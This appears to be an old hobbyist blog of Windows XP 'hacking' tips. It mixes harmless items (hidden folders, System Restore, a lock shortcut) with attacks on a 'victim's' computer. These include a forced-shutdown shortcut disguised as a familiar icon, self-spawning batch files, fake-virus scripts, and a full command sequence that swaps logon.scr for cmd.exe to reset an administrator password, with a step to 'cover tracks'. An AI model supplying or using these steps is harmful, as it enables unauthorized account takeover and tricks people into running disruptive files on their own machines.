The Only Place For All Your Computer Solutions!!!

Becoming a computer geek is now a piece of cake.Learn Computer Hacking,Mobile Hacking,Repair Windows,Game Troubleshooting,Computer Hardware Selection,Cracking, Game Reviews,Java,C++ Encoding And Much More!! FOR FREE!!

USEFUL INFO

Use Labels given below for organized navigation of this blog.

In this post I m going to tell the various emotions of people when they see their PC's behaving unexpectedly.All you need is one friend and his computer system and of course some privacy!!!
So here are few easy ways to do that:-

1)Run an application and see unexpected expert comments.
Its the easiest way to make your friend smile or frown depending on your intentions.

a)Create a textfile in notepad and type msg *YOUR COMMENTS. Save the file as anything.bat(Use any fancy name here to attract your victim). Also remember to put it under the category of All Files while saving.
b)Now you just need to make your victim click on that file.

2)Forced shutdown of a computer after a timer.
This will display a custom error message and start a countdown which will shut down the computer.

1)Right-click your desktop and create a new shortcut.

2)Paste the following code into the Location box in the Create Shortcut menu:
shutdown -s -t 30 -c “Your message here“

3)Replace 30 with the length of the countdown you want (in seconds) and place your custom error message between the quotes.

4) Click next and name the shortcut to something the victim would be likely to click on such as “Internet explorer” or “My Documents”, etc.

5)Next you’d want to change the icon. Right-click on the shortcut you made and click properties. Find the Change Icon button and click it. Choose a suitable icon for the name you chose earlier.

And that’s all! Now you just have to sneak the shortcut onto the victim’s desktop and run!

Note: to stop it, open Run from the start menu and type shutdown-a.

3)Endless Command prompt windows
This will open up a series of command prompt windows that will never end.
The basic idea is that there are two .bat files that open the other one when opened, so the other one opens the first one again and the windows just won’t stop coming.

How to do this:
1. Fire up notepad and type: start 2.bat
2. Save it as 1.bat (make sure you choose all files when saving it)
3. Make another new text document and type: start 1.bat
4. Save it as 2.bat into the same folder as the other one.

All you have to do to start it is to click on either of them.

The only way to stop it is to wait for the windows to become so numerous that they are a group on the taskbar. Then you can use Close group to get rid of the sequence.

4)Fake Command prompt viruses
These are also a good way to make the victim believe that a worm is gnawing at their hard drive and that they can’t do anything to stop it.

Open up notepad and type @echo off

* To make text appear, type it after an echo tag.
* To have the the commands wait for the user to press any key type pause

(Note: if you write pause >nul it won’t display Press Any key to continue…)

* To have a complete high-speed description of files in the drive of the .bat file, type dir /s
* You can also initiate any other command we covered earlier, such as shutdown, error message, etc.

5.And why no include all of these in one fake virus?



Remember everything here is for Informational Purposes Only
Cheers.

In the following blog we will tell you how to keep your data safe and secure from 'strangers' on your workstation.'Strangers' may include brothers,sisters,friends anyone who you want to keep away from viewing a private data.Well here it is.

1)Right click anywhere where you want to create your folder.Say desktop for example and then click on new and click on folder.

2)You will see a folder created and asking for it to be named.Just do not name it anything and press ALT + 255(Ascii Value for a new line) and you will see that the folder name will be a blank space.Press Enter.

3)Then right click on folder,go to its Properties and go to the Customize Tab and select Change Icon.

4)When it opens scroll almost 1/4th to the right and you will see three blank spaces.
Select the middle one and click on apply.

5)Then click anywhere else on the screen and whooosssh..your folder is invisible.Completely away from the eyes of your not so good friends!!Cheers and Please Post!!

1. Click Start, click Run, type %SystemRoot%\system32\restore\rstrui.exe, and then click OK.
2. On the Welcome to System Restore page, click Create a restore point, and then click Next .
3. On the Create a Restore Point page, type a name for the restore point and then click Create
4. After the restore point has been created, click Close.

Note If System Restore is turned off, you receive a message that asks whether you want to turn on System Restore now. Click Yes. Then, in the System Properties dialog box, click to clear the Turn off System Restore check box, click OK, and then repeat this step.



Manual steps to restore the registry in Windows XP
Use System Restore to undo registry changes in in Windows XP

1. Click Start, click Run, type %SystemRoot%\System32\Restore\Rstrui.exe, and then click OK.
2. On the Welcome to System Restore page, click Restore my computer to an earlier time (if it is not already selected), and then click Next .
3. On the Select a Restore Point page, click the system checkpoint. In the On this list select the restore point area, click an entry that is named "Guided Help (Registry Backup)," and then click Next. If a System Restore message appears that lists configuration changes that System Restore will make, click OK.
4. On the Confirm Restore Point Selection page, click Next. System Restore restores the previous Windows XP configuration and then restarts the computer.
5. Log on to the computer. When the System Restore confirmation page appears, click OK..

Uh..mm now you guys must be wondering what is registry??
ah..well Windows Registry is a hierarchical database blah..blah..blah..thats wiki for you.In simple words its a system file containing all sorts of information about the Windows operating system itself.
To edit registry.
1.Click on Start.
2.Click on Run.
3.Write regedit in the space provided.

You must also take back-up of your registry as described in the later post.
Now you can try out the following hacks:

1.No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

2.Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

After you have had the fun,just restore the backup of the registry as descibred in the post on how to restore registry.

So this is our first post on hacking and we have tried to keep this as simple as possible.
1.Password Hacking-If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly(Note:*=comment):


cd\ *drops to root
cd\windows\system32 *directs to the system32 directory
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backs up logon.scr(scr=screensaver)
copy cmd.exe temphack\cmd.exe *backs up cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Batman and you want the password to be joker enter this

"net user Batman joker"

and this changes the password on Batman's machine to joker and your in.


Fairly simple and easy.Isn't it?(Please comment)

Very Imp: Do not forget to copy the contents of temphack back into the system32 directory to cover tracks.

2.Create a Shortcut to lock your computer-
Leaving your computer in a hurry but you don’t want to log off?
You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver.
Now how to do this?
To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation
Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish.

Q.Now what to do?
A.You're done already.

Enjoy!